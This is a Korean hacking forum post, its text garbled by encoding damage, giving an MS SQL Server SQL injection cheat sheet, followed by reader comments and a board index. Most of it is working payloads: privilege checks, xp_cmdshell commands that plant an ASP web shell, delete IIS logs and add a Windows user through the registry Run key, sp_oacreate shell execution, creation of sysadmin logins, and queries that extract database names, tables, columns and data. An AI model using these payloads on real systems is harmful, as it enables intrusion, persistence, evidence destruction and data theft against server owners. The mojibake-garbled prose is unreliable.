1581, 1/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   subroutine
   http://blog.naver.com/31337__
   sql ÀÎÁ§¼Ç °ø°Ý±â¹ý

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1177 [º¹»ç]


#########################################
# SQL Injection¿¡ ÀÇÇØ ÀÚÁÖ »ý¼ºµÇ´Â Å×ÀÌºí ¸í
#########################################
D99_CMD, D99_REG, D99_Tmp, DIY_TEMPCOMMAND_TABLE, t_jiaozhu, Siwebtmp,
NB_Commander_Tmp, comd_list, Reg_Arrt,  jiaozhu, Reg_Arrt, xiaopan, DIY_TEMPTABLE,
heige, kill_kk, SC_LOG, SC_TRAN



########################################
# CHECK
#########################################

and 1=(select @@version) //version

and 1=(IS_SRVROLEMEMBER('sysadmin')) // Àüü ±ÇÇÑ(sysadmin£¬dbcreator£¬diskadmin£¬processadmin£¬serveradmin£¬setupadmin£¬securityadmin)
and 1=(IS_MEMBER('db_owner')) // ÇØ´ç DB ±ÇÇÑ

;declare @a int;--  // »ç¿ë¿©ºÎ
and 0<>db_name() // DB¸í
and user>0 // USER¸í

#########################################
# Áß±¹ ÇØÄ¿µéÀÌ ¾Ö¿ëÇÏ´Â °ø°ÝÆÐÅÏ
#########################################

;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';-- // File
;exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt' // LOG
;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add' // Registry

DROP TABLE kill_kk;CREATE TABLE kill_kk(subdirectory VARCHAR(100)À¬
depth VARCHAR(100)À¬[file] VARCHAR(100)) Insert kill_kk
exec master..xp_dirtree "D:/"À¬ 1À¬1-- // Table »ý¼º

DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

#########################################
# °ø°Ý ½Ã³ª¸®¿À
#########################################

;DROP TABLE [X_5450];use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt+char(124) End from (Select Top 1 id,ResultTxt from [X_5450] order by [id]) T order by [id] desc)>0


;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

;CREATE TABLE [X_5450]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [X_5450](ResultTxt) exec master.dbo.xp_cmdshell 'dir c:';insert into [X_5450] values ('g_over');exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--

;use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'OSQL -E -S localhost -d master -Q "exec sp_addsrvrolemember dir c:,sysadmin"'--

;use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'OSQL -E -S localhost -d master -Q "exec sp_addlogin dir c:,xiaoxue"'--

;DROP TABLE [X_5450];use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

#########################################
# ±âŸ Äõ¸®¹®
#########################################

¸ðµç db¸í Äõ¸®Çϱâ
and 1=(select name from master.dbo.sysdatabases where dbid=7)
and 1=(select name from master.dbo.sysdatabases where dbid=8)

ƯÁ¤db¿¡¼­ »ç¿ëÀÚ°¡ ¸¸µç Å×À̺í¸í ºÒ·¯¿À±â
and 0<>(select top 1 name from snortids.dbo.sysobjects where xtype=char(85))
and 0<>(select top 1 name from (select top ÇàÁõ°¡ name from .dbo.sysobjects where xtype='U' order by name asc) as table1 order by name desc)

Å×À̺íÀÇ Ä÷³Á¤º¸ ºÒ·¯¿À±â

ƯÁ¤ Å×À̺í°íÀ¯ID °¡Á®¿À±â(char(97)+char(98)+char(99)=abc) 1061578820
and 0<>(select count(*) from snortids.dbo.sysobjects where xtype='U' and name=char(97)+char(99)+char(105)+char(100)+char(95)+char(101)+char(118)+char(101)+char(110)+char(116) and uid>(str(id)))

Ä÷³¸í °¡Á®¿À±â
and 0<>(select top 1 name from snortids.dbo.syscolumns where id=1061578820)
and 0<>(select top 1 name from (select top ÇàÁõ°¡ name from snortids.dbo.syscolumns where id=1061578820 order by name asc) as table1 order by name desc)

µ¥ÀÌÅÍ °¡Á®¿À±â
and 0<>(select top 1 char(94)+Cast(sig_name as varchar(8000))+char(94) from SnortIDS..acid_event)
and 0<>(select top 1 char(94)+Cast(Ä÷³¸í as varchar(8000))+char(94) from SnortIDS..acid_event where Ä÷³¸í not in('À̹̾òÀº³»¿ë'))
and 0<>(select top 1 char(94)+Cast(Ä÷³¸í as varchar(8000))+char(94) from (select top Çà¼ö Ä÷³¸í from SnortIDS.dbo.acid_event order by Ä÷³¸í asc) as table1 order by Ä÷³¸í desc)

-subroutine-

  Hit : 18996     Date : 2009/01/11 01:52



    
BHM D99_CMD, D99_REG, D99_Tmp, DIY_TEMPCOMMAND_TABLE, t_jiaozhu, Siwebtmp,
NB_Commander_Tmp, comd_list, Reg_Arrt, jiaozhu, Reg_Arrt, xiaopan, DIY_TEMPTABLE,
heige, kill_kk, SC_LOG, SC_TRAN -- ´ëºÎºÐÀÌ ä¹D,NB ¶õ Åø¿¡¼­ »ý¼ºµÈ Å×À̺í¸íÀ̱º...ÂÁÂÁ
2009/01/19  
zhuji90 ¹«½¼ ¾ð¾îÀΰ¡¿ä...? 2009/02/09  
ÆÒ´õ°íÀº ¤·¤µ¤·..½Å±âÇϳ׿ä 2009/07/10  
xodnr631 »ì¦ ÀÐÀ»¸¸ Çϳ׿ä, °¨»çÇÕ´Ï´Ù. 2010/09/24  
     [°øÁö] °­Á¸¦ ¿Ã¸®½Ç ¶§´Â ¸»¸Ó¸®¸¦ ´Þ¾ÆÁÖ¼¼¿ä^¤Ñ^ [29] ¸Û¸Û 02/27 18685
1580   °í¼ö´ÔµéÀÇ µµ¿òÀ» ¹Þ°í ½Í½À´Ï´Ù     vbnm111
02/11 140
1579   ¸®´ª½º Ä¿³Î 2.6 ¹öÀü ÀÌÈÄÀÇ LKM     jdo
07/25 649
1578   ½©ÄÚµå ¸ðÀ½     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/15 1460
1577   Call by value VS Call by Reference     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/15 850
1576   (²Ä¼ö) L.O.B Çѹ濡 Ŭ¸®¾îÇϱâ[2]     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/14 1166
1575   towelroot.c (zip) ÄÚ¸àÆÃ.[1]     scube
08/18 3696
1574   levitator.c (¾Èµå·ÎÀÌµå ·çÆÃ) °ø°Ý ºÐ¼® ¼Ò½º ÄÚµå °øÀ¯.[4]     scube
08/17 3616
1573   ¹«·á Á¤º¸º¸¾È ±â¼úÀÎÀç ¾ç¼º °úÁ¤ ±³À°»ý ¸ðÁý     chanjung111
06/17 4407
1572   K-Shield ÁִϾî 5±â ¸ðÁý     lrtk
06/17 4151
1571   [ÆÁ] ÆÄÀ̽ã 2¼Ò½º¸¦ 3À¸·Î º¯°æÇØÁÖ´Â »çÀÌÆ®[3]     ÇѽÂÀç
05/13 3845
1570   ±¸±Û ¹é¸µÅ© ÀÛ¾÷ Áú¹®¿ä     wkatnxka
03/30 3301
1569   [ÆÁ] ¿ìºÐÅõ ¹Ì·¯¸µ¼­¹ö     ÇѽÂÀç
03/09 3987
1568 ºñ¹Ð±ÛÀÔ´Ï´Ù  °¨À»¸øÀâ°Ú³×¿ä¤Ì¤Ì     À×À×À×
01/15 3
1567   µ¥ºñ¾È °è¿­ ¸®´ª½º ÀÇÁ¸¼º ±úÁ³À»¶§ ÇØ°á¹ý     ÇѽÂÀç
11/27 4462
1566   È«º¸ÇÕ´Ï´Ù. ½Å»ý º¸¾ÈÄ¿¹Â´ÏƼÀÔ´Ï´Ù.     kimwoojin0952
10/26 4196
1565   ½Å±âÇÑ ÇÁ·Î±×·¡¹Ö ¾ð¾î[3]     koreal33t
09/06 4593
1564   À©µµ¿ì,¸®´ª½º¿¡¼­ ³» ip¸¦ È®ÀÎÇØ º¸ÀÚ [1]     koreal33t
09/06 3794
1563   CTF »çÀÌÆ®[1]     koreal33t
09/06 4447
1562   ÀÚ°ÝÁõ (¹®Á¦)»çÀÌÆ® [2]     koreal33t
09/06 4263
1 [2][3][4][5][6][7][8][9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org